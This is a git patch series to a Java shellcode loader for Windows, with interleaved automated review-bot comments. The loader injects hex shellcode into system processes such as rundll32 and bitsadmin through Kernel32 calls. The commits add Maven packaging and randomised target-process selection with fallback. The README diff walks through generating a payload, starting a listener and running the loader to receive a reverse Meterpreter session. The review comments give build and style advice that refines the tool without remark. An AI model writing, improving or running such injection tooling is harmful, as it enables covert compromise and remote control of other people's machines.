From 347bba69b70aa679505c38d3a3c418c407a37157 Mon Sep 17 00:00:00 2001 From: yzddmr6 Date: Wed, 21 Jun 2023 14:48:09 +0800 Subject: [PATCH 1/4] =?UTF-8?q?=E6=94=AF=E6=8C=81maven=E6=89=93=E5=8C=85?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .gitignore | 33 +++++++++++++++++++ pom.xml | 14 +++++--- src/main/java/asexploits/ShellcodeLoader.java | 2 +- src/main/resources/assembly.xml | 27 +++++++++++++++ 4 files changed, 71 insertions(+), 5 deletions(-) create mode 100644 .gitignore create mode 100644 src/main/resources/assembly.xml diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..4544264 --- /dev/null +++ b/.gitignore @@ -0,0 +1,33 @@ +# Compiled class file +*.class + +# Eclipse +.project +.classpath +.settings/ + +# Intellij +*.ipr +*.iml +*.iws +.idea/ +.vscode/ + +# Maven +target/ + +# Gradle +build +.gradle + +# Log file +*.log +log/ + +# out +**/out/ + +# Mac +.DS_Store + +temp/ \ No newline at end of file diff --git a/pom.xml b/pom.xml index fda7eef..67f48ed 100644 --- a/pom.xml +++ b/pom.xml @@ -28,7 +28,13 @@ - + + net.java.dev.jna + jna-platform + 1.2.0 + system + ${project.basedir}/lib/tinyjna.jar + @@ -60,9 +66,9 @@ asexploits.ShellcodeLoader - - jar-with-dependencies - + + src/main/resources/assembly.xml + diff --git a/src/main/java/asexploits/ShellcodeLoader.java b/src/main/java/asexploits/ShellcodeLoader.java index a4eed6b..22d6d8e 100644 --- a/src/main/java/asexploits/ShellcodeLoader.java +++ b/src/main/java/asexploits/ShellcodeLoader.java 
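Review bot: The dependency added in the first pom.xml hunk carries the upstream coordinates `net.java.dev.jna` / `jna-platform` / `1.2.0` but is resolved with `system` scope from `${project.basedir}/lib/tinyjna.jar`, so the declared artifact does not correspond to what is actually compiled and packaged (the README line removed in the following patch describes the bundled JNA as a modified build). `system` scope is deprecated in Maven and bypasses repository checksum verification, so nothing in the build records or checks the contents of that jar. Giving the modified library its own coordinates — `mvn install:install-file` into a local or project-scoped `file://` repository whose `.sha1` is committed — keeps its provenance visible to anyone auditing the build and would let the assembly descriptor drop its separate `system`-scope dependency set. The element names in this hunk are stripped in this rendering, so the tag structure is inferred from the values.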
@@ -18,7 +18,7 @@ public class ShellcodeLoader { static Kernel32 kernel32; static IKernel32 iKernel32; public static String[] ProcessArrayx32 = {"C:\\Windows\\SysWOW64\\ARP.exe", "C:\\Windows\\SysWOW64\\at.exe", "C:\\Windows\\SysWOW64\\auditpol.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\bootcfg.exe", "C:\\Windows\\SysWOW64\\ByteCodeGenerator.exe", "C:\\Windows\\SysWOW64\\cacls.exe", "C:\\Windows\\SysWOW64\\chcp.com", "C:\\Windows\\SysWOW64\\CheckNetIsolation.exe", "C:\\Windows\\SysWOW64\\chkdsk.exe", "C:\\Windows\\SysWOW64\\choice.exe", "C:\\Windows\\SysWOW64\\cmdkey.exe", "C:\\Windows\\SysWOW64\\comp.exe", "C:\\Windows\\SysWOW64\\diskcomp.com", "C:\\Windows\\SysWOW64\\Dism.exe", "C:\\Windows\\SysWOW64\\esentutl.exe", "C:\\Windows\\SysWOW64\\expand.exe", "C:\\Windows\\SysWOW64\\fc.exe", "C:\\Windows\\SysWOW64\\find.exe", "C:\\Windows\\SysWOW64\\gpresult.exe"}; - public static String[] ProcessArrayx64 = {"C:\\Windows\\System32\\rundll32.exe", "C:\\Windows\\System32\\find.exe", "C:\\Windows\\System32\\notepad.exe", "C:\\Windows\\System32\\ARP.EXE"}; + public static String[] ProcessArrayx64 = {"C:\\Windows\\System32\\rundll32.exe", "C:\\Windows\\System32\\find.exe", "C:\\Windows\\System32\\fc.exe", "C:\\Windows\\System32\\ARP.EXE", "C:\\Windows\\System32\\expand.exe"}; static { kernel32 = (Kernel32) Native.loadLibrary(Kernel32.class, W32APIOptions.UNICODE_OPTIONS); diff --git a/src/main/resources/assembly.xml b/src/main/resources/assembly.xml new file mode 100644 index 0000000..0345be0 --- /dev/null +++ b/src/main/resources/assembly.xml @@ -0,0 +1,27 @@ + + + jar-with-dependencies + + + jar + + + false + + + + / + true + true + runtime + + + + + / + true + true + system + + + \ No newline at end of file From ec7a5f48a4dcef50e14a2651833701e8fde707a7 Mon Sep 17 00:00:00 2001 From: yzddmr6 Date: Wed, 21 Jun 2023 14:54:31 +0800 Subject: [PATCH 2/4] Update README.md --- README.md | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) 
diff --git a/README.md b/README.md index 8e8ae23..f05406e 100644 --- a/README.md +++ b/README.md @@ -10,9 +10,7 @@ ## 编译 -当前版本使用的jna经过魔改,不支持maven编译。 - -需要使用idea的构建工件功能进行打包,具体方法请咨询百度。 +maven package ## 使用 @@ -42,7 +40,7 @@ java -jar ShellcodeLoader.jar --x64 shellcode_hex No encoder specified, outputting raw payload Payload size: 354 bytes Final size of hex file: 708 bytes -fce88f0000006089e531d2648b5xxxx +fce88f0000006089e531d2648b5.... ``` 然后开启监听 @@ -59,7 +57,7 @@ exploit -j ### 客户端 ``` -java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5xxxx +java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5.... ``` 即可收到反弹的Meterpreter From 3ec80024c49af461cd86913b7474b2cd8b022255 Mon Sep 17 00:00:00 2001 From: yzddmr6 Date: Wed, 21 Jun 2023 15:53:44 +0800 Subject: [PATCH 3/4] Update ShellcodeLoader.java --- src/main/java/asexploits/ShellcodeLoader.java | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/src/main/java/asexploits/ShellcodeLoader.java b/src/main/java/asexploits/ShellcodeLoader.java index 22d6d8e..bdd6e11 100644 --- a/src/main/java/asexploits/ShellcodeLoader.java +++ b/src/main/java/asexploits/ShellcodeLoader.java 
@@ -17,7 +17,7 @@ public class ShellcodeLoader { static Kernel32 kernel32; static IKernel32 iKernel32; - public static String[] ProcessArrayx32 = {"C:\\Windows\\SysWOW64\\ARP.exe", "C:\\Windows\\SysWOW64\\at.exe", "C:\\Windows\\SysWOW64\\auditpol.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\bootcfg.exe", "C:\\Windows\\SysWOW64\\ByteCodeGenerator.exe", "C:\\Windows\\SysWOW64\\cacls.exe", "C:\\Windows\\SysWOW64\\chcp.com", "C:\\Windows\\SysWOW64\\CheckNetIsolation.exe", "C:\\Windows\\SysWOW64\\chkdsk.exe", "C:\\Windows\\SysWOW64\\choice.exe", "C:\\Windows\\SysWOW64\\cmdkey.exe", "C:\\Windows\\SysWOW64\\comp.exe", "C:\\Windows\\SysWOW64\\diskcomp.com", "C:\\Windows\\SysWOW64\\Dism.exe", "C:\\Windows\\SysWOW64\\esentutl.exe", "C:\\Windows\\SysWOW64\\expand.exe", "C:\\Windows\\SysWOW64\\fc.exe", "C:\\Windows\\SysWOW64\\find.exe", "C:\\Windows\\SysWOW64\\gpresult.exe"}; + public static String[] ProcessArrayx32 = {"C:\\Windows\\SysWOW64\\ARP.exe", "C:\\Windows\\SysWOW64\\at.exe", "C:\\Windows\\SysWOW64\\auditpol.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\bootcfg.exe", "C:\\Windows\\SysWOW64\\ByteCodeGenerator.exe", "C:\\Windows\\SysWOW64\\cacls.exe", "C:\\Windows\\SysWOW64\\CheckNetIsolation.exe", "C:\\Windows\\SysWOW64\\chkdsk.exe", "C:\\Windows\\SysWOW64\\choice.exe", "C:\\Windows\\SysWOW64\\cmdkey.exe", "C:\\Windows\\SysWOW64\\comp.exe", "C:\\Windows\\SysWOW64\\Dism.exe", "C:\\Windows\\SysWOW64\\esentutl.exe", "C:\\Windows\\SysWOW64\\expand.exe", "C:\\Windows\\SysWOW64\\fc.exe", "C:\\Windows\\SysWOW64\\find.exe", "C:\\Windows\\SysWOW64\\gpresult.exe"}; public static String[] ProcessArrayx64 = {"C:\\Windows\\System32\\rundll32.exe", "C:\\Windows\\System32\\find.exe", "C:\\Windows\\System32\\fc.exe", "C:\\Windows\\System32\\ARP.EXE", "C:\\Windows\\System32\\expand.exe"}; static { 
@@ -53,6 +53,10 @@ public static void main(String[] args) { jnaLoader.loadShellCode(shellcode, is64); } + public void loadShellCode(String shellcodeHex) { + this.loadShellCode(shellcodeHex, false); + } + public void loadShellCode(String shellcodeHex, boolean is64) { String[] targetProcessArray = null; From 484f58e43d3857bbb0ab6bf69ee9559f980cf5fc Mon Sep 17 00:00:00 2001 From: yzddmr6 Date: Tue, 27 Jun 2023 16:35:41 +0800 Subject: [PATCH 4/4] =?UTF-8?q?=E5=A2=9E=E5=BC=BA=E5=85=BC=E5=AE=B9?= =?UTF-8?q?=E6=80=A7?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/main/java/asexploits/ShellcodeLoader.java | 44 ++++++++++++++++--- 1 file changed, 37 insertions(+), 7 deletions(-) diff --git a/src/main/java/asexploits/ShellcodeLoader.java b/src/main/java/asexploits/ShellcodeLoader.java index bdd6e11..2e48247 100644 --- a/src/main/java/asexploits/ShellcodeLoader.java +++ b/src/main/java/asexploits/ShellcodeLoader.java @@ -12,6 +12,7 @@ import com.sun.jna.win32.StdCallLibrary; import com.sun.jna.win32.W32APIOptions; +import java.io.File; import java.util.Random; public class ShellcodeLoader { 
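Review bot: The new `loadShellCode(String shellcodeHex)` overload fixes `is64` to `false` without saying so, and a caller reading only this signature cannot tell which path is taken. A one-line Javadoc on the new method, `/** Convenience overload: delegates to {@link #loadShellCode(String, boolean)} with is64 = false. */`, makes the default explicit. The two-argument method it delegates to begins in this hunk but its body continues outside it.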
@@ -60,21 +61,50 @@ public void loadShellCode(String shellcodeHex) {
 public void loadShellCode(String shellcodeHex, boolean is64) {
 String[] targetProcessArray = null;
+ //打乱数组顺序
+ shuffleArray(ProcessArrayx64);
+ shuffleArray(ProcessArrayx32);
 // java是64位且选择注入64位shellcode
 if (System.getProperty("sun.arch.data.model").equals("64") && is64) {
- targetProcessArray = ProcessArrayx64;
+ targetProcessArray = mergeArrays(ProcessArrayx64, ProcessArrayx32);
 } else {
 //默认注入32位进程
- targetProcessArray = ProcessArrayx32;
+ targetProcessArray = mergeArrays(ProcessArrayx32, ProcessArrayx64);
+ }
+ String targetProcess = null;
+ for (int i = 0; i < targetProcessArray.length; i++) {
+ targetProcess = targetProcessArray[i];
+ if (new File(targetProcess).exists()) {
+ break;
+ }
 }
- int j = targetProcessArray.length;
- byte b = 0;
- Random random = new Random();
- int k = b + random.nextInt(j);
- String targetProcess = targetProcessArray[k];
 this.loadShellCode(shellcodeHex, targetProcess);
 }
+ public static void shuffleArray(String[] arr) {
+ Random rand = new Random();
+ for (int i = arr.length - 1; i > 0; i--) {
+ int index = rand.nextInt(i + 1);
+ String temp = arr[i];
+ arr[i] = arr[index];
+ arr[index] = temp;
+ }
+ }
+
+ public static String[] mergeArrays(String[] a, String[] b) {
+ String[] c = new String[a.length + b.length];
+ int i = 0;
+ for (String s : a) {
+ c[i] = s;
+ i++;
+ }
+ for (String s : b) {
+ c[i] = s;
+ i++;
+ }
+ return c;
+ }
+
 public void loadShellCode(String shellcodeHex, String targetProcess) {
 System.out.println("targetProcess: " + targetProcess);
 byte[] shellcode = hexStrToByteArray(shellcodeHex);
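Review bot: `shuffleArray` is called on the public static `ProcessArrayx64` and `ProcessArrayx32` themselves, so every call to `loadShellCode(String, boolean)` permutes shared class state, and nothing documents that the fields no longer hold their declared order. Shuffling a copy keeps the fields stable, and the standard library already provides both helpers: `List<String> pool = new ArrayList<>(Arrays.asList(a)); Collections.shuffle(pool);` replaces the hand-rolled Fisher–Yates, and `Stream.concat(Arrays.stream(a), Arrays.stream(b)).toArray(String[]::new)` replaces `mergeArrays`. The `else` branch's comment `//默认注入32位进程` ("default: 32-bit process") is now stale, since both branches build a merged list in which the other array's entries serve as fallback; `// preferred-arch candidates first, then the other arch; first path that exists wins` would describe what the loop does. If none of the candidates exists, the loop leaves `targetProcess` at the last entry and the call proceeds regardless — that outcome deserves a comment, and `loadShellCode(String, String)` continues outside the hunk.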